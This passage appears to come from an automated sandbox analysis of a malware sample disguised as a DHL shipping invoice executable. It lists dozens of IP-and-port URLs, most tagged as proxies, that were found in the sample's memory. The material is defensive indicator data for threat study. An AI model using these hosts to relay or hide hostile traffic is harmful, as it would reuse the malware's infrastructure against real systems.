                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.211.250.131:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.211.250.131:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.217.10.12:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.217.10.12:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.238.231.65:1994
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.238.231.65:1994://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.3.72.38:3629
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.3.72.38:3629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.4.205.226:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.4.205.226:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.4.209.58:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.4.209.58:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.43.92.240:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.43.92.240:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.5.77.211
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.5.77.211://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.5.77.211:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.57.131.158:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.58.248.86
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.58.248.86://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.58.248.86:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.6.56.133:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.6.56.133:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.63.174.18:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.63.174.18:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.71.24.129:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.71.24.129:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.82.105.123:43949
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.82.105.123:43949://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.83.15.241:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.90.22.106:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.90.22.106:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.125:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.125:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.150:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.94.212.150:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.232.137:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.232.137:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98154F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.236.40:2023
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.236.40:2023://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.83:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.83:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.88:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.88:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.90:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.97.238.90:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.101.80.162
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.101.80.162://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.101.80.162:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.135.67:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.135.67:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.26:8085
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.102.254.26:8085://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.240.153.144:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.240.153.144:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.7.85.20
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.7.85.206:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.7.85.206:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.96.100.33:3155
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.96.100.33:3155://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.19.66:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.19.66:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.2.198:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980109000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.9.228:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://191.97.9.228:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.134.10:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.111.134.10:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.141.236
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98346C000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.141.236.3:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.141.236.3:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.154.195.76:9000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.154.195.76:9000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.154.244.92:9000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.154.244.92:9000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.196
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.196:27262
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.196:27262://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.196:59559
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.196:59559://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:37327
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:37327://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.200.80:61437://proxyH
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:10185
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:10185://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:40886
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:40886://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:43100
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.201.131:43100://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10185
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10185://proxyx
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9838E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10722
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9838E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.163.202.88:10722://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:12919
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:12919://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:20317
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:20317://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:45366://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:46191
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:46191://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:50578
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:50578://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:7251://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.244.80:49588
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.244.80:49588://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.171.119.166:53149
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.171.119.166:53149://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.177.75.45://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.203.0.190:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.203.0.190:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.241.177.96:10599
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.241.177.96:10599://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.216.81:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.216.81:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.46.233.158:61968
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.46.233.158:61968://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.64.115.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.64.115.90:39948
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.64.115.90:39948://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.128.182:8089
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.128.182:8089://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.169.19:8449
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.169.19:8449://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.169.19:8450
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.169.19:8450://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:13003
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:13003://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:29360
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:29360://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:44523
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:44523://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.207.129:63404
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.57.96:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.57.96:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.138.178.6:8282
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.138.178.6:8282://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.176.242.186
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.176.242.186://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.176.242.186:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.19.255.21:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.19.255.21:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983803000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.56.84:8081
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.56.84:8081://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.58.92:8081
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.248:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.248:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.249:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.249:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.30.13.18:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.30.13.18:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.95.110:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.95.110:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.41.88.58:53281
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98371A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.41.88.58:53281://proxyx
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.181:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.181:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.59.26.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.59.26.116:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.59.26.116:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.116.72.46:7497
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.116.72.46:7497://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981742000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.124.36.75:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98174D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.124.36.75:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.163.149.123:1111
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.163.149.123:1111://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.163.159.93:2942://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.127.60
